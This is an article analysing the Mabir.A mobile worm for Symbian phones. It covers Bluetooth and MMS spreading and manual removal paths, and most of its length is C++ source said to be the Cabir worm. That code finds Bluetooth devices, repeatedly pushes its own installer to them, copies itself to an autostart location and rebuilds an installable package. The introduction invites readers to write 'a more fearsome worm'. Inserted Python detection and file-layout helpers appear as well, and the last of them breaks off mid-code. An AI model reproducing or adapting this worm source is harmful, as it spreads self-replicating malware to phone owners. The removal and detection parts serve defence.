Analysing Mabir.A Virus


BY Delphiscn (cnBlaster#hotmail.com) http://blog.youkuaiyun.com/delphiscn

----[Table of contents

0x01.Introduction

0x02.Mabir.A's details & solution

0x03.Code

0x04.Reference

----[ 0x01. Introduction

Nowadays many computer viruses plague us. With the development of
technology, viruses for mobile phones have also appeared. So it is not
only systems such as Windows and Linux that get infected; mobile phones
based on Symbian OS and Windows CE are attacked as well...

This article uses one example to show how a virus infects a device and
how it works. Maybe some of the points in this paper will give you some
inspiration to write a more fearsome worm :)

----[ 0x02. Mabir.A's details & solution

Mabir is a worm for the Symbian Series 60 platform that spreads over Bluetooth
and MMS. As soon as it has infected a system, it searches for other mobile
phones equipped with Bluetooth and sends them a copy of the virus (a SIS file).

The file sent always has the same name, caribe.sis. This deserves attention:
although the filename is the same as the one used by the Caribe worm, the two
worms differ in some respects.

Besides Bluetooth, Mabir.A also listens for all MMS and SMS messages on the
infected phone and replies to them with info.sis, a copy of the virus.

The MMS messages Mabir sends in reply contain no text, only the info.sis file.

Next, let's talk a little about MMS.

An MMS message is a kind of multimedia message that can carry any information
to mobile phones that support MMS technology. As its name suggests, MMS should
contain only multimedia, such as pictures, audio and video. In fact it can
contain anything, including infected files. Mabir always disguises itself as a
Symbian installation package to get you to execute it.

Killing Mabir.A

1. Install a file manager program on the device.

2. Enable the option to view the files in the system folder.

3. Delete the following malicious files:
Profimail v2.75_FULL.sis
\system\install\Profimail v2.75_FULL.sis
C:\System\Apps\AppInst\Appinst.aif
C:\System\Apps\AppInst\Appinst.app
C:\System\Apps\caribe\caribe.rsc
C:\System\Apps\caribe\caribe.app
C:\System\Apps\caribe\flo.mdl
C:\System\recogs\flo.mdl
C:\System\Fonts\11x12 euro_fonts.gdr
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.RSC
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.APP
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.SIS
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\INFO.SIS

4. Reinstall the following programs that were overwritten by the threat:
ProfiMail
ProfiExplorer

Detailed description:

1. Spreading by Bluetooth

When spreading this way, Mabir always copies itself to a file named caribe.sis.
The SIS file contains three of the virus's files:

caribe.app, caribe.rsc and flo.mdl

When the SIS file is installed, it executes caribe.app automatically, which
starts the worm.

Once Mabir.A is active, it immediately searches for other Bluetooth phones and
copies itself to them. If the target system refuses, it still keeps sending the
same messages, just like a DDoS.

2. Spreading by MMS

When spreading by MMS, Mabir sends a copy of the infected SIS file. The message
includes info.sis but contains no text.

Infection

When the Mabir SIS file is installed, it copies the worm to these locations:

\system\apps\Caribe\Caribe.app
\system\apps\Caribe\Caribe.rsc
\system\apps\Caribe\flo.mdl

When Mabir.exe executes, it copies these files:

\system\symbiansecuredata\caribesecuritymanager\Caribe.app
\system\symbiansecuredata\caribesecuritymanager\Caribe.rsc

and rebuilds the SIS file at:

\system\symbiansecuredata\caribesecuritymanager\Info.sis

If these steps succeed, Mabir.A searches for all Bluetooth phones in range and
begins waiting for incoming MMS and SMS messages.
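
The file locations in the removal list and in the Infection section above can be checked mechanically on an extracted copy of a phone's file system or memory card. The Python below is an added example, not part of the original article: it assumes the copy is available under a local directory, drops the drive letter, and matches case-insensitively because the page writes the same paths in different letter case.

```python
import os
import sys
import tempfile

# Paths copied from the removal list and the Infection section of this page,
# with the drive letter dropped so the scan works on any mounted copy.
ARTIFACT_PATHS = (
    r"\system\install\Profimail v2.75_FULL.sis",
    r"\System\Apps\AppInst\Appinst.aif",
    r"\System\Apps\AppInst\Appinst.app",
    r"\System\Apps\caribe\caribe.rsc",
    r"\System\Apps\caribe\caribe.app",
    r"\System\Apps\caribe\flo.mdl",
    r"\System\recogs\flo.mdl",
    r"\System\Fonts\11x12 euro_fonts.gdr",
    r"\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.RSC",
    r"\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.APP",
    r"\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.SIS",
    r"\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\INFO.SIS",
)
# File names the page lists without a directory; matched anywhere in the tree.
ARTIFACT_NAMES = ("Profimail v2.75_FULL.sis",)


def norm_path(path):
    """Fold case and separators so 'System/Apps' equals '\\system\\apps'."""
    parts = path.replace("\\", "/").lower().split("/")
    return "/".join(p for p in parts if p)


def scan(root):
    """Return sorted relative paths under root that match a listed artifact."""
    wanted_paths = {norm_path(p) for p in ARTIFACT_PATHS}
    wanted_names = {n.lower() for n in ARTIFACT_NAMES}
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            if norm_path(rel) in wanted_paths or name.lower() in wanted_names:
                hits.append(rel.replace(os.sep, "/"))
    return sorted(hits)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        found = scan(sys.argv[1])
    else:
        # Constructed demo tree: empty placeholder files, not malware samples.
        with tempfile.TemporaryDirectory() as tmp:
            for rel in ("system/apps/Caribe/Caribe.app",
                        "system/apps/Notes/notes.app"):
                full = os.path.join(tmp, *rel.split("/"))
                os.makedirs(os.path.dirname(full), exist_ok=True)
                open(full, "wb").close()
            found = scan(tmp)
    print("\n".join(found) or "no listed artifacts found")
```

A hit means a file exists at a location the page lists, not that its content is malicious; review each file before deleting it as described in the removal steps.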

----[ 0x03. Code

Note:

This code is Cabir, the predecessor of Mabir. Compared with each other,
Cabir and Mabir may have some differences.

#include "general.h"

#include "caribebt.h"

#include <eikenv.h>

#include <bt_sock.h>

#include <obex.h>

#include <btextnotifiers.h>

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////

CaribeBluetooth::CaribeBluetooth():

CActive(CActive::EPriorityStandard)

{

WithAddress = 0;

iState = 3;

_LIT(currentFileName,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.SIS");

iCurrFile = CObexFileObject::NewL(TPtrC(NULL, 0));

iCurrFile->InitFromFileL(currentFileName);

CActiveScheduler::Add(this);

}

CaribeBluetooth::~CaribeBluetooth()

{

}

CaribeBluetooth* CaribeBluetooth::NewL()

{

return NewLC();

}

CaribeBluetooth* CaribeBluetooth::NewLC()

{

CaribeBluetooth* self = new CaribeBluetooth;

self->ConstructL();

return self;

}

void CaribeBluetooth::ConstructL()

{

iState = 3;

RunL();

}

void CaribeBluetooth::RunL()

{

if(iState == 1)

{

if(!obexClient->IsConnected())

{

iState = 3;

}

else

{

//iCurrObject = CObexNullObject::NewL();

//iCurrObject->SetNameL(_L("Hello World"));

//obexClient->Put(*iCurrObject,iStatus);

iState = 2;

Cancel();

obexClient->Put(*iCurrFile,iStatus);

SetActive();

return;

}

}

if(iState == 2)

{

//delete iCurrObject;

iState = 3;

Cancel();

obexClient->Disconnect(iStatus);

SetActive();

return;

}

if(iState == 3)

{

if(obexClient)

{

delete obexClient;

obexClient = NULL;

}

while(iState == 3)

{

FindDevices();

ManageFoundDevices();

}

return;

}

}

void CaribeBluetooth::DoCancel()

{

}

int CaribeBluetooth::FindDevices()

{

_LIT(KL2Cap, "BTLinkManager");

int res;

if((res = socketServ.Connect()) != KErrNone)

{

//ErrMessage("Error Connect");

return 0;

}

if((res = socketServ.FindProtocol((const
TProtocolName&)KL2Cap,pInfo))!=KErrNone)

{

//ErrMessage("Error FindProtocol");

socketServ.Close();

return 0;

}

if((res = hr.Open(socketServ,pInfo.iAddrFamily,pInfo.iProtocol))!=KErrNone)

{

//ErrMessage("Error Open");

socketServ.Close();

return 0;

}

WithAddress = 0;

addr.SetIAC(KGIAC);

addr.SetAction(KHostResInquiry);

TRequestStatus iStatusIn;

hr.GetByAddress(addr, entry, iStatusIn);

User::WaitForRequest(iStatusIn);

if(iStatusIn!=KErrNone)

{

//ErrMessage("Error Finding Devices");

}

else

{

WithAddress = 1;

}

socketServ.Close();

// hr.Close();

return 0;

}

int CaribeBluetooth::ManageFoundDevices()

{

if(WithAddress)

{

WithAddress = 0;

Cancel();

TBTSockAddr btaddr(entry().iAddr);

TBTDevAddr devAddr;

devAddr = btaddr.BTAddr();

TObexBluetoothProtocolInfo obexBTProtoInfo;

obexBTProtoInfo.iTransport.Copy(_L("RFCOMM"));

obexBTProtoInfo.iAddr.SetBTAddr(devAddr);

obexBTProtoInfo.iAddr.SetPort(0x00000009);

obexClient = CObexClient::NewL(obexBTProtoInfo);

if(obexClient)

{

iState = 1;

iStatus = KRequestPending;

Cancel();

obexClient->Connect(iStatus);

SetActive();

}

}

else

{

iState = 3;

User::After(1000000);

}

return 0;

}

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////

#include "general.h"

#include "CaribeInstaller.h"

#include <aknapp.h>

#include <e32std.h>

#include <e32base.h>

#include <e32def.h>

#include <f32file.h>

#include <bautils.h>

#include <eikenv.h>

#include "file.h"

//#include "sisheader.h"

#define AUTOSTARTABLE "C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.APP"

_LIT(Autostartablestr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.APP");

#define AUTOSTARTABLERSC "C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.RSC"

_LIT(Autostartablerscstr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.RSC");

#define AUTOSTARTABLEPATH "C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\"

_LIT(Autostartablepathstr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\");

#define RECOGFILE "C:\\SYSTEM\\RECOGS\\FLO.MDL"

_LIT(Recogfilestr,"C:\\SYSTEM\\RECOGS\\FLO.MDL");

#define RECOGFILEPATH "C:\\SYSTEM\\RECOGS\\"

_LIT(Recogfilepathstr,"C:\\SYSTEM\\RECOGS\\");

#define SISFILE "C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.SIS"

_LIT(Sisfilestr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.SIS");

unsigned short DOCRC16(unsigned short crc,void * array,int size);

CaribeInstaller::CaribeInstaller()

{

}

CaribeInstaller::~CaribeInstaller()

{

}

/*************************************************************
*********

CopyMeToAutostartableDir:

This function will copy the own dll of this application to

"C:\SYSTEM\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.APP"
.

.mdl for autostart will start that application automaticly.

Parameters:

CAknApplication of the application to be copied.

Returned Values:

None.

**************************************************************
*********/

void CaribeInstaller::CopyMeToAutostartableDir(CAknApplication * OwnApp)

{

TFileName OwnDllName = OwnApp->DllName();

TBuf16 <sizeof(AUTOSTARTABLE)>Autostartable(Autostartablestr);

OwnDllName.UpperCase();

if(OwnDllName == Autostartable)

{

return;

}

RFs fs;

User::LeaveIfError(fs.Connect());

TBuf16 <sizeof(AUTOSTARTABLEPATH)>
autostartablepath(Autostartablepathstr);

fs.MkDirAll(Autostartablepathstr);

if(BaflUtils::CopyFile(fs,OwnDllName,Autostartable,CFileMan::EOverWrite)!=KErrNone)

{

fs.Close();

return;

}

TBuf16 <sizeof(AUTOSTARTABLERSC)> Autostartablersc (Autostartablerscstr);

OwnDllName[OwnDllName.Length()-3] = 'R';

OwnDllName[OwnDllName.Length()-2] = 'S';

OwnDllName[OwnDllName.Length()-1] = 'C';

if(BaflUtils::CopyFile(fs,OwnDllName,Autostartablersc,CFileMan::EOverWrite)!=KErrNone)

{

BaflUtils::DeleteFile(fs,Autostartable,0);

}

fs.Close();

return;

}

/*************************************************************
*********

InstallMDL:

This function will install the mdl file to the recogs directory.

Parameters:

CAknApplication of this application for constructing the path

of the mdl.

Returned Values:

None.

**************************************************************
*********/

void CaribeInstaller::InstallMDL(CAknApplication * OwnApp)

{

RFs fs;

User::LeaveIfError(fs.Connect());

TFileName OwnDllName = OwnApp->DllName();

TBuf16 <sizeof(RECOGFILE)>Recogfile(Recogfilestr);

TParse parser;

parser.Set(OwnDllName,NULL,NULL);

TBuf16 <KMaxPath> flodrivepath(parser.DriveAndPath());

_LIT16(FLOMDL,"flo.mdl");

flodrivepath.Append(FLOMDL);

TBuf16 <sizeof(RECOGFILEPATH)> Recogfilepath(Recogfilepathstr);

fs.MkDirAll(Recogfilepath);

BaflUtils::CopyFile(fs,flodrivepath,Recogfile,CFileMan::EOverWrite);

fs.Close();

}

/*************************************************************
*********

CreateSis:

This function will create a .sis file with caribe.app,caribe.rsc

and flo.mdl

Parameters:

CAknApplication of this application for constructing the path

of the mdl.

Returned Values:

None.

**************************************************************
*********/

void CaribeInstaller::CreateSis(CAknApplication * OwnApp)

{

unsigned char sisheader[] =

{

0x3D ,0x1A ,0x8B ,0x03 ,0x12 ,0x3A ,0x00 ,0x10

,0x19 ,0x04 ,0x00 ,0x10 ,0xC4 ,0xE0 ,0x80 ,0xAB

//Offset 0x10 CRC16

,0x00 ,0x00 ///////

///////////////////

,0x01 ,0x00 ,0x03 ,0x00 ,0x01 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x21 ,0x00 ,0x00 ,0x00

,0xC8 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00

,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x64 ,0x00 ,0x00 ,0x00 ,0x66 ,0x00 ,0x00 ,0x00

,0xF6 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x0A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x0A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

//Offset 0x50 Size of Packed Data/////

,0xCC ,0x20 ,0x01, 0x00///////////////

//////////////////////////////////////

,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x18 ,0x00 ,0x00 ,0x00 ,0x12 ,0x01

,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0x2A ,0x01

,0x00 ,0x00

//Offset 0x82 size of packed file 3

,0x61 ,0xA0 ,0x00 ,0x00

//Offset 0x86: offset of third packed file//

,0x3C ,0x02,0x00 ,0x00 /////////////////////

////////////////////////////////////////////

//Offset 0x8a again size of packed file 3

,0x61 ,0xA0 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x6A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x12 ,0x00 ,0x00 ,0x00 ,0x6A ,0x01

,0x00 ,0x00 ,0x3A ,0x00 ,0x00 ,0x00 ,0x7C ,0x01

,0x00 ,0x00

//Offset 0xB2 size of packed file 2

,0x59 ,0x80 ,0x00 ,0x00

//Offset 0xB6: offset of second packed file//

, 0x9D ,0xA2 ,0x00 ,0x00 ////////////////////

/////////////////////////////////////////////

//Offset 0xBA again size of packed file 2

,0x59 ,0x80 ,0x00 ,0x00

,0x00 ,0x00

,0x00 ,0x00 ,0xB6 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x18 ,0x00 ,0x00 ,0x00 ,0xB6 ,0x01

,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0xCE ,0x01

,0x00 ,0x00

//Offset 0xE2 size of packed file 1

,0x12 ,0x00 ,0x00 ,0x00

//Offset 0xE6: offset of first packed file//

,0xF6 ,0x22,0x01 ,0x00 /////////////////////

////////////////////////////////////////////

//Offset 0xEA again size of packed file 1

,0x12 ,0x00 ,0x00 ,0x00

,0x00 ,0x00

,0x00 ,0x00 ,0x0E ,0x02 ,0x00 ,0x00 ,0x88 ,0x6F

,0x1F ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x22 ,0x00 ,0x00 ,0x00 ,0x0E ,0x02

,0x00 ,0x00 ,0x0C ,0x00 ,0x00 ,0x00 ,0x30 ,0x02

,0x00 ,0x00 ,0x2E ,0x00 ,0x5C ,0x00 ,0x63 ,0x00

,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00

,0x65 ,0x00 ,0x2E ,0x00 ,0x61 ,0x00 ,0x70 ,0x00

,0x70 ,0x00 ,0x21 ,0x00 ,0x3A ,0x00 ,0x5C ,0x00

,0x73 ,0x00 ,0x79 ,0x00 ,0x73 ,0x00 ,0x74 ,0x00

,0x65 ,0x00 ,0x6D ,0x00 ,0x5C ,0x00 ,0x61 ,0x00

,0x70 ,0x00 ,0x70 ,0x00 ,0x73 ,0x00 ,0x5C ,0x00

,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00

,0x62 ,0x00 ,0x65 ,0x00 ,0x5C ,0x00 ,0x63 ,0x00

,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00

,0x65 ,0x00 ,0x2E ,0x00 ,0x61 ,0x00 ,0x70 ,0x00

,0x70 ,0x00 ,0x2E ,0x00 ,0x5C ,0x00 ,0x66 ,0x00

,0x6C ,0x00 ,0x6F ,0x00 ,0x2E ,0x00 ,0x6D ,0x00

,0x64 ,0x00 ,0x6C ,0x00 ,0x21 ,0x00 ,0x3A ,0x00

,0x5C ,0x00 ,0x73 ,0x00 ,0x79 ,0x00 ,0x73 ,0x00

,0x74 ,0x00 ,0x65 ,0x00 ,0x6D ,0x00 ,0x5C ,0x00

,0x61 ,0x00 ,0x70 ,0x00 ,0x70 ,0x00 ,0x73 ,0x00

,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00

,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x5C ,0x00

,0x66 ,0x00 ,0x6C ,0x00 ,0x6F ,0x00 ,0x2E ,0x00

,0x6D ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x2E ,0x00

,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00

,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x2E ,0x00

,0x72 ,0x00 ,0x73 ,0x00 ,0x63 ,0x00 ,0x21 ,0x00

,0x3A ,0x00 ,0x5C ,0x00 ,0x73 ,0x00 ,0x79 ,0x00

,0x73 ,0x00 ,0x74 ,0x00 ,0x65 ,0x00 ,0x6D ,0x00

,0x5C ,0x00 ,0x61 ,0x00 ,0x70 ,0x00 ,0x70 ,0x00

,0x73 ,0x00 ,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00

,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00

,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00

,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x2E ,0x00

,0x72 ,0x00 ,0x73 ,0x00 ,0x63 ,0x00 ,0x53 ,0x00

,0x65 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x65 ,0x00

,0x73 ,0x00 ,0x36 ,0x00 ,0x30 ,0x00 ,0x50 ,0x00

,0x72 ,0x00 ,0x6F ,0x00 ,0x64 ,0x00 ,0x75 ,0x00

,0x63 ,0x00 ,0x74 ,0x00 ,0x49 ,0x00 ,0x44 ,0x00

,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00

,0x62 ,0x00 ,0x65 ,0x00

};

unsigned char rscraw[] =

{

/*0x0C,0x00,0x07,0x00,0x04,0x00,0x00,0x00,

0x01,0x60,0xA2,0x11,0x04,0x00,0x0C,0x00,

0x0C,0x00*/

0x24,0x00,0x09,0x00,0x04,0x00,0x00,0x00,0x01,0x60,

0xA2,0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,

0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x0C,0x00,

0x0C,0x00,0x24,0x00

};

TBuf16 <sizeof(SISFILE)>Sisfile(Sisfilestr);

TBuf16 <sizeof(RECOGFILE)>Recogfile(Recogfilestr);

TBuf16 <sizeof(AUTOSTARTABLE)>Appfile(Autostartablestr);

TBuf16 <sizeof(AUTOSTARTABLERSC)>Rscfile(Autostartablerscstr);

unsigned short crc = 0;

int i;

int leidos;

unsigned char bytesdata[100];

File fsis;

File fRecog;

File fApp;

int RecogSize;

int AppSize;

int RscSize;

if(!fsis.Open(Sisfile,File::OMCreate|File::OMWrite|File::OMRead))

{

if(!fsis.Open(Sisfile,File::OMReplace|File::OMRead|File::OMWrite))

{

return;

}

}

if(!fRecog.Open(Recogfile,File::OMOpen|File::OMRead))

{

fsis.Close();

return;

}

fRecog.rFile.Size(RecogSize);

if(!fApp.Open(Appfile,File::OMOpen|File::OMRead))

{

fsis.Close();

fRecog.Close();

return;

}

fApp.rFile.Size(AppSize);

RscSize = sizeof(rscraw);

unsigned short CRC16; //0x10

unsigned int SizeData; //0x50

unsigned int OffsetData1; //0xE6

unsigned int OffsetData2; //0xB6

unsigned int OffsetData3; //0x86

unsigned int SizeData11; //0xE2

unsigned int SizeData12; //0xEA

unsigned int SizeData21; //0xB2

unsigned int SizeData22; //0xBA

unsigned int SizeData31; //0x82

unsigned int SizeData32; //0x8A

CRC16 = 0;

SizeData = RecogSize+AppSize+RscSize;

SizeData11= RscSize;

SizeData21= RecogSize;

SizeData31= AppSize;

SizeData12 = RscSize;

SizeData22 = RecogSize;

SizeData32 = AppSize;

OffsetData3 = 0x0000023c;

OffsetData2 = 0x0000023c+AppSize;

OffsetData1 = 0x0000023c+AppSize+RecogSize;

//Writing header

crc = DOCRC16(crc,sisheader,0x10);

crc = DOCRC16(crc,&sisheader[0x12],0x50-0x12);

fsis.Write(sisheader,0x50);

crc = DOCRC16(crc,&SizeData/*&sisheader[0x50]*/,4); //SizeData;
//0x50

fsis.Write(&SizeData/*sisheader[0x50]*/,4);

crc = DOCRC16(crc,&sisheader[0x54],0x82-0x54);

fsis.Write(&sisheader[0x54],0x82-0x54);

crc = DOCRC16(crc,&SizeData31/*&sisheader[0x82]*/,0x04);//SizeData31;
//0x82

crc = DOCRC16(crc,&OffsetData3/*&sisheader[0x86]*/,0x04);//OffsetData3;
//0x86

crc = DOCRC16(crc,&SizeData32/*&sisheader[0x8a]*/,0x04);//SizeData32;
//0x8A

fsis.Write(&SizeData31/*&sisheader[0x82]*/,0x04);

fsis.Write(&OffsetData3/*&sisheader[0x86]*/,0x04);

fsis.Write(&SizeData32/*&sisheader[0x8a]*/,0x04);

crc = DOCRC16(crc,&sisheader[0x8e],0xb2-0x8e);

fsis.Write(&sisheader[0x8e],0xb2-0x8e);

crc = DOCRC16(crc,&SizeData21/*&sisheader[0xB2]*/,0x04);//SizeData21;

crc = DOCRC16(crc,&OffsetData2/*&sisheader[0xB2]*/,0x04);//OffsetData2;

crc = DOCRC16(crc,&SizeData22/*&sisheader[0xB2]*/,0x04);//SizeData22;

fsis.Write(&SizeData21/*&sisheader[0xB2]*/,0x04);

fsis.Write(&OffsetData2/*&sisheader[0xB2]*/,0x04);

fsis.Write(&SizeData22/*&sisheader[0xB2]*/,0x04);

crc = DOCRC16(crc,&sisheader[0xbe],0xe2-0xbe);

fsis.Write(&sisheader[0xbe],0xe2-0xbe);

crc = DOCRC16(crc,&SizeData11/*&sisheader[0xe2]*/,0x04);//SizeData11;

crc = DOCRC16(crc,&OffsetData1/*&sisheader[0xe2]*/,0x04);//OffsetData1;

crc = DOCRC16(crc,&SizeData12/*&sisheader[0xe2]*/,0x04);//SizeData12;

fsis.Write(&SizeData11/*&sisheader[0xe2]*/,0x04);

fsis.Write(&OffsetData1/*&sisheader[0xe2]*/,0x04);

fsis.Write(&SizeData12/*&sisheader[0xe2]*/,0x04);

crc = DOCRC16(crc,&sisheader[0xee],0x23c-0xee);

fsis.Write(&sisheader[0xee],0x23c-0xee);

//Writing app

while(leidos = fApp.Read(bytesdata,100))

{

crc = DOCRC16(crc,bytesdata,leidos);

fsis.Write(bytesdata,leidos);

}

//Writing recog

while(leidos = fRecog.Read(bytesdata,100))

{

crc = DOCRC16(crc,bytesdata,leidos);

fsis.Write(bytesdata,leidos);

}

//Writing rsc

crc = DOCRC16(crc,rscraw,sizeof(rscraw));

fsis.Write(rscraw,sizeof(rscraw));

fsis.Seek(ESeekStart,0x10);

fsis.Write(&crc,2);

fsis.Close();

fRecog.Close();

fApp.Close();

}

unsigned short DOCRC16(unsigned short crc,void * _array,int size)

{

//static unsigned int polynomial = 0x1021;

//static unsigned short _table[256], index;

unsigned short crcTab[256] =

{0x0000,0x1021,0x2042,0x3063,0x4084,0x50a5,0x60c6,0x70e7,0x8108,0x9
129,0xa14a,

0xb16b,0xc18c,0xd1ad,0xe1ce,0xf1ef,0x1231,0x0210,0x3273,0x2252,0x52b
5,0x4294,

0x72f7,0x62d6,0x9339,0x8318,0xb37b,0xa35a,0xd3bd,0xc39c,0xf3ff,0xe3de
,0x2462,

0x3443,0x0420,0x1401,0x64e6,0x74c7,0x44a4,0x5485,0xa56a,0xb54b,0x85
28,0x9509,

0xe5ee,0xf5cf,0xc5ac,0xd58d,0x3653,0x2672,0x1611,0x0630,0x76d7,0x66f6
,0x5695,

0x46b4,0xb75b,0xa77a,0x9719,0x8738,0xf7df,0xe7fe,0xd79d,0xc7bc,0x48c4
,0x58e5,

0x6886,0x78a7,0x0840,0x1861,0x2802,0x3823,0xc9cc,0xd9ed,0xe98e,0xf9a
f,0x8948,

0x9969,0xa90a,0xb92b,0x5af5,0x4ad4,0x7ab7,0x6a96,0x1a71,0x0a50,0x3a
33,0x2a12,

0xdbfd,0xcbdc,0xfbbf,0xeb9e,0x9b79,0x8b58,0xbb3b,0xab1a,0x6ca6,0x7c87
,0x4ce4,

0x5cc5,0x2c22,0x3c03,0x0c60,0x1c41,0xedae,0xfd8f,0xcdec,0xddcd,0xad2a,
0xbd0b,

0x8d68,0x9d49,0x7e97,0x6eb6,0x5ed5,0x4ef4,0x3e13,0x2e32,0x1e51,0x0e
70,0xff9f,

0xefbe,0xdfdd,0xcffc,0xbf1b,0xaf3a,0x9f59,0x8f78,0x9188,0x81a9,0xb1ca,0
xa1eb,

0xd10c,0xc12d,0xf14e,0xe16f,0x1080,0x00a1,0x30c2,0x20e3,0x5004,0x402
5,0x7046,

0x6067,0x83b9,0x9398,0xa3fb,0xb3da,0xc33d,0xd31c,0xe37f,0xf35e,0x02b
1,0x1290,

0x22f3,0x32d2,0x4235,0x5214,0x6277,0x7256,0xb5ea,0xa5cb,0x95a8,0x85
89,0xf56e,

0xe54f,0xd52c,0xc50d,0x34e2,0x24c3,0x14a0,0x0481,0x7466,0x6447,0x542
4,0x4405,

0xa7db,0xb7fa,0x8799,0x97b8,0xe75f,0xf77e,0xc71d,0xd73c,0x26d3,0x36f2
,0x0691,

0x16b0,0x6657,0x7676,0x4615,0x5634,0xd94c,0xc96d,0xf90e,0xe92f,0x99c
8,0x89e9,

0xb98a,0xa9ab,0x5844,0x4865,0x7806,0x6827,0x18c0,0x08e1,0x3882,0x28
a3,0xcb7d,

0xdb5c,0xeb3f,0xfb1e,0x8bf9,0x9bd8,0xabbb,0xbb9a,0x4a75,0x5a54,0x6a37
,0x7a16,

0x0af1,0x1ad0,0x2ab3,0x3a92,0xfd2e,0xed0f,0xdd6c,0xcd4d,0xbdaa,0xad8b
,0x9de8,

0x8dc9,0x7c26,0x6c07,0x5c64,0x4c45,0x3ca2,0x2c83,0x1ce0,0x0cc1,0xef1f,
0xff3e,

0xcf5d,0xdf7c,0xaf9b,0xbfba,0x8fd9,0x9ff8,0x6e17,0x7e36,0x4e55,0x5e74,0
x2e93,

0x3eb2,0x0ed1,0x1ef0

};

unsigned short * table = NULL;

unsigned char * array = (unsigned char *)_array;

int i;

if(!table)

{

table = crcTab;

/*

table = _table;

table[0]=0;

for (index = 0; index < 128; index++)

{

unsigned int carry = table[index] & 0x8000;

unsigned int temp = (table[index] << 1) & 0xffff;

table[index * 2 + (carry ? 0 : 1)] = temp ^ polynomial;

table[index * 2 + (carry ? 1 : 0)] = temp;

} */

}

for(i=0;i<size;i++)

{

crc = ((crc << 8) ^ table[((crc >> 8) ^ array[i]) & 0xff]);

}

return crc;

}
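
The offset comments in CreateSis and the DOCRC16 routine above describe enough of the generated file to check a captured sample against it. The Python below is an added example for analysts, not code from the article or from the worm: it reads the fields those comments name (checksum at 0x10, total packed size at 0x50, three size/offset/size records, data starting at 0x23c, little-endian as the header bytes show), recomputes the checksum and reports whether the layout is consistent. The function names are assumptions of this example, and the bitwise CRC gives the same result as the table lookup with polynomial 0x1021 and initial value 0.

```python
import struct

DATA_START = 0x23C        # offset of the first packed file in the generated SIS
CRC_OFFSET = 0x10         # 2-byte checksum, skipped when the checksum is computed
TOTAL_SIZE_OFFSET = 0x50  # combined size of the three packed files
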